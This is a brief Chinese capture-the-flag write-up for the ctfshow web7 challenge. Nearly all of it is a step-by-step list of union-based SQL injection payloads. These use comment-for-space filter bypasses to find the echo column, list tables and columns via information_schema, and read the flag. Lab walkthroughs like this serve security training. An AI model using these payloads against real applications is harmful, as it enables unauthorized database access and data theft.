ctfshow WEB web7
访问页面是这样的,随便点开一个页面发现 URL 里面有一个参数 id,这十有八九就是 SQL注入了
经过不断尝试......
查看回显位置
-1/**/union/**/select/**/1,2,3
查看数据库名
-1/**/union/**/select/**/1,database(),3
查看库中表名
-1/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema="web7"),3
查看表中列名
-1/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name="flag"),3
查看列下数据
-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3